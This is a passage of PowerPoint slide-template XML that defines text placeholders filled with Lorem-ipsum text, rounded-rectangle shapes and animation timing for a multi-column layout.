          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8504773" y="5428506"/>
            <a:ext cx="3071281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08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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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4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3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3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3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4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4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4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"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="4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4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4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4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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="5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300" fill="hold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300" fill="hold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300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400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400" fill="hold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400" fill="hold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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="6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4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4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4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3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="7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300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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400"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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1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1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3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9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4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4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4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4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="10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300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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400"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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1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4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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4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4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3" dur="4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5000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="12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300" fill="hold"/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300" fill="hold"/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9" dur="300"/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400"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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3" dur="400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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1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1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1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1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5500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14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6" dur="4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4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8" dur="4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6000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15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2" dur="300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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4" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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400"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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8" dur="400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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1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3" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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1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" grpId="0" animBg="1"/>
      <p:bldP spid="13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32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5" grpId="0" animBg="1"/>
      <p:bldP spid="66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6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6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6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69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6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6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1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7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7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0" grpId="0" animBg="1"/>
      <p:bldP spid="111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1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1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2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12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3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3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0" grpId="0" animBg="1"/>
      <p:bldP spid="131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3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3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36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3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3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5" grpId="0" animBg="1"/>
      <p:bldP spid="146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4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4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4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49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4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4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1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5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5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5" grpId="0" animBg="1"/>
      <p:bldP spid="156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5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5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5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7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57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5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5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8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5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5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ic lis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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text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03251" y="827103"/>
            <a:ext cx="10972800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101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Rounded Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 21"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 22"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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57" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="39" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623715" y="1730116"/>
            <a:ext cx="704141" cy="67451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600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr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 smtClean="0"/>
              <a:t>ico</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58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1327856" y="2143841"/>
            <a:ext cx="2346677" cy="260794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59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603256" y="2563390"/>
            <a:ext cx="3071281" cy="234389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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus.is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper semper. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vesti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fringilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> males </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>uada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dolor ante.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="55" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1327856" y="1724596"/>
            <a:ext cx="2346677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Chort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>title</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Rounded Rectangle 60"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4002264" y="1703191"/>
            <a:ext cx="144000" cy="3204089"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst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2" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="56" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4535315" y="1730116"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>ico</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="57" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5239456" y="2143841"/>
            <a:ext cx="2346677" cy="260794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64" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="58" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4514856" y="2563390"/>
            <a:ext cx="3071281" cy="234389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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus.is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper semper. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vesti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fringilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> males </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>uada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dolor ante.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="59" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5239456" y="1724596"/>
            <a:ext cx="2346677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Chort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>title</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Rounded Rectangle 65"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7998531" y="1703191"/>
            <a:ext cx="144000" cy="3204089"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst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Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="60" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8508299" y="1730116"/>
            <a:ext cx="704141" cy="67451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600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3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 smtClean="0"/>
              <a:t>ico</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="61" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9212440" y="2143841"/>
            <a:ext cx="2346677" cy="260794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69" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="62" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8487840" y="2563390"/>
            <a:ext cx="3071281" cy="234389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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
